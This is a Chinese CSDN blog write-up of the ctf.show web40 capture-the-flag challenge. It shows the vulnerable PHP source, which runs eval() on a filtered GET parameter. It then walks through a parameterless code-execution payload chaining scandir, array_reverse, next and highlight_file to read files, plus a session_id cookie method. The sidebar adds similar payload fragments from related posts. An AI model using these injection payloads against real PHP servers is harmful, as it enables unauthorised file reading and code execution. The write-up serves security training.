ctf.show_web40(命令执行)

最新推荐文章于 2024-04-30 20:09:14 发布
最新推荐文章于 2024-04-30 20:09:14 发布
阅读量691 收藏 3
点赞数 6
分类专栏: ctf.show-wp 文章标签: 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46250265/article/details/114266578
版权

web40无参数RCE绕过

源码

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

大佬的wp
利用无参数RCE的姿势
一个坑的地方就是括号:

并不是(),而是()
参考:PHP Parametric Function RCE

方法一

读文件+数组改造
先把payload写下

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

需要用到的函数
localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
scandir():获取目录下的文件,scandir(.):获取当前目录下所有文件
pos():返回数组中的当前元素的值。
array_reverse():数组逆序
next(): 函数将内部指针指向数组中的下一个元素,并输出。
highlight_file():函数进行文件内容的读取,并输出

解答

00x1

首先通过 pos(localeconv())得到点号(.)
该方法还有如下函数可以进行替换

dirname(_FILE_)
current(localeconv()
reset(localeconv()
pos(localeconv()
getcwd()

因为scandir(’.’)表示得到当前目录下的文件,所以
scandir(pos(localeconv()))就能得到根目录的文件了。
具体内容如下
在这里插入图片描述

00x2

然后得到的文件数组结果,发现想要获取的文件排序在后面,这时候可以调整文件指针,用
array_reverse()函数,将输出文件反向排序
在这里插入图片描述

00x3

next(): 函数将内部指针指向数组中的下一个元素,并输出。
想要输出指定的指针文件,next()函数需要配合highlight_file()函数进行文件的输出
在这里插入图片描述

方法二

利用session_id()

刚开始的时候利用session_id(),修改下cookie中的PHPSESSID 内容为ls
在这里插入图片描述
但是在进步传参为flag是无法进行文件读取
在这里插入图片描述
具体的原因分析
来自: https://blog.csdn.net/miuzzx/article/details/108415301
经过测试发现,受php版本影响 5.5 -7.1.9均可以执行,因为session_id规定为0-9,a-z,A-Z,-中的字符。在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。
受到PHP版本的限制。

like4h
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTF.rar_ctf_seed7rj
09-21
CEUCE T FEHRENHET CNVERTER
CTFshow web(命令执行 41-44)
csjjjd的博客
02-08 1606
把对应的字符一一找到,然后在bp上提交就好,注意hackbar上提交的话会有换行的干扰,在bp提交。从进行异或的字符中排除掉被过滤的,然后在判断异或得到的字符是否为可见字符。根据脚本运行结果会出现每个字符对应的表示方法,构造。知识点:引用chin“师傅的表格来解释好一些。# @Author: 羽。
php正则 过滤 特殊符号,PHP过滤★等特殊符号的正则
weixin_28802499的博客
03-09 688
PHP过滤★等特殊符号的正则复制代码 代码如下:if(preg_match("/[ '.,:;*?~`!@#$%^&+=)(<>{}]|\]|\[|\/|\\\|\"|\|/",$user)){echo '不要在名字里面整些特殊符号,请只使用字母、数字和汉字,当然要你的浏览器要选简体中文GB2312哟,千万不要选繁体、中文HZ等。返回修改后,再来,我等你哟!';exit();}...
ctfhub(rce智慧树)
qq_62046696的博客
07-21 518
刚看完rce知识点做一下题,巩固一下、
ctfshow 命令执行
m0_74097148的博客
05-21 3240
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
命令执行(2)ctfshow_web入门命令执行web39-49
weixin_47726676的博客
04-25 298
web39 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c.".php"); } }else{ highlight_file(__FILE__); } 没有回响,并且加了php的后缀,38的解法还是可以使用 ?c=data://text/plain,<?=system("tac
CTFSHOW web入门——web40
m0_74093152的博客
04-24 489
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
命令执行各种姿势总结
weixin_48427966的博客
04-24 845
一、绕过if(!eval($c);web30。
[红明谷CTF 2021]write_shell 反引号与短标签
qq_54929891的博客
04-10 1704
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
ctf.rar_ctf
09-21
this is script from my ctf
hac.zip_CTF信息隐写_ctf
09-23
CTF信息隐写,非常简单的入门小实验,带你走进CTF
Python-dsstore:用于解析.DS_Store文件并提取文件名的库
05-03
./samples/目录中包含一个CTF格式的示例文件,您可以使用python3 main.py ./samples/.DS_Store.ctf尝试解析器。 这是我的博客文章,试图详细解释其结构和格式: : 用法 $ python main.py samples/.DS_Store.ctf ...
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 489
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
等保测评常见安全风险
weixin_64392888的博客
04-28 492
9. **网络分段风险**:二级及以上系统应将重要网络区域和非重要网络区域划分在不同网段或子网,避免生产网络和办公网络混在一起带来的风险。1. **信息泄露风险**:评估系统中存储、传输和处理的敏感信息的安全性,防止数据被非法获取,避免个人隐私泄露或公司机密泄露等问题。13. **个人信息保护风险**:二级及以上系统在未授权的情况下不应采集、存储用户个人隐私信息,避免违规行为带来的风险。5. **不安全的通信风险**:评估传输数据时的加密和解密机制,确保数据在传输过程中的安全,防止数据被窃听或篡改。
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 551
Linux服务器安全基础 - 查看入侵痕迹
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
最新发布
南七小僧的学海无涯
04-30 508
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
Go语言的map并发读写如何保证安全
技术笔记
04-28 876
为了保证Go语言中map的并发安全,我们可以使用互斥锁(如sync.Mutex或)来保护对map的访问,或者使用并发安全的map实现(如sync.Map选择哪种方式取决于具体的应用场景和需求。在大多数情况下,使用互斥锁是一个灵活且可靠的选择,而sync.Map则适用于特定的读多写少场景。推荐阅读Golang实战项目分享Golang专栏Go语言异常处理方式。
ctf.show_web9
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令注入到URL中,从而执行系统命令,读取配置文件中的flag。其中,引用提供了一个读取配置文件的payload,而引用则是ffifdyop的MD5加密结果,可能是某个关键信息的加密结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

like4h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值